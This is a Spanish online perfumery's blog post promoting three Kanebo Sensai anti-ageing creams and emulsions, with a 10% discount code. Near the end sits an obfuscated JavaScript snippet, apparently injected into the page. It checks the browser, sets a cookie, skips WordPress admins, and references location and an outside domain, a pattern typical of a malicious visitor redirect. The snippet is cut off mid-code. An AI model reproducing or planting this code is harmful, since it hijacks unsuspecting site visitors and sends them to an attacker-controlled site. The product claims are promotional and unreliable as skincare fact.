comprar kanebo sensai online

 

Hoy queremos hablaros un poquito sobre una de las marcas de cosmética más vendidas en nuestra tienda de perfumería online, se trata de Kanebo/Sensai.

Los orígenes de la casa Kanebo SENSAI se remontan a principios del siglo XX, cuando el fundador de Kanebo que poseía unos telares, descubrió que las mujeres que hilaban con una seda especial, tenían las manos siempre jóvenes. De ahí surgió la idea de crear una línea de cosmética anti-age.

Inspirándose en la búsqueda de la belleza infinita, SENSAI combina una avanzada tecnología aplicada al cuidado de la piel con el poder supremo de su exquisito ingrediente estrella, la Seda Koishimaru.

El primer producto que os presentamos es la crema antiedad Extra Intensive de Kanebo Sensai.

comprar online kanebo sensai

 

 

 

 

 

 

 

 

 

 

 

Sensai nos promete una piel más sedosa día tras día, mes a mes. La nueva Serie Extra Intensiva ofrece resultados rápidos y duraderos, que contribuyen a devolver la elasticidad a la piel y a recobrar su hidratación y su luminosidad desde el primer día, mientras estimula su poder innato para potenciar una belleza natural mes a mes. Su poder de cuidado antiedad intensivo total nos ofrece a través de su fórmula suave y exquisita, elaborada a partir de aceites exclusivos. Se funde en nuestra piel, revitalizando su aspecto y su tacto de forma inmediata. Conseguiremos que la piel se revele más firme y radiante, y ofreciendo un tacto más sedoso día tras día.

En esta época del año comenzamos a lucir escotes, por ello no hay que descuidar nuestra piel de cuello y escote, como ya os comentábamos en este post. Para este importante cometido Kanebo Sensai nos presenta Throat and Bust de la gama Cellullar Performance.

Es un tratamiento específico para cuello y escote, que gracias a su fórmula que favorece la síntesis del colágeno y acelera la lipólisis en el cuello, el pecho y el escote, reafirma y define la piel y minimiza las arrugas y las pequeñas manchas.

kanebo-sensai-cellular-performance-throat-and-bust

 

 

 

 

 

 

 

 

 

 

 

 

En tercer y último lugar Cellullar Performance Emulsion Light una emulsión perfecta para el veranito, especialmente indicada para pieles grasas, ya que su rápida absorción y su textura ligera la hacen perfecta para esta época del año. Su fórmula antiedad fue diseñada para combatir con los principales 5 problemas del envejecimiento de la piel.

kanebo-sensai-cellular-performance-emulsion-i-light

 

 

 

 

 

 

 

 

 

 

 

 

Así que si os apetece probar algunos de estos “must” de Sensai Kanebo que sepáis que durante los días 3 y 4 de junio insertado el código PRM6KNB obtendrás un 10% de descuento en todos los productos de la marca Kanebo Sensai. Creemos que es una muy buena oportunidad para descubrirlos.

 

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone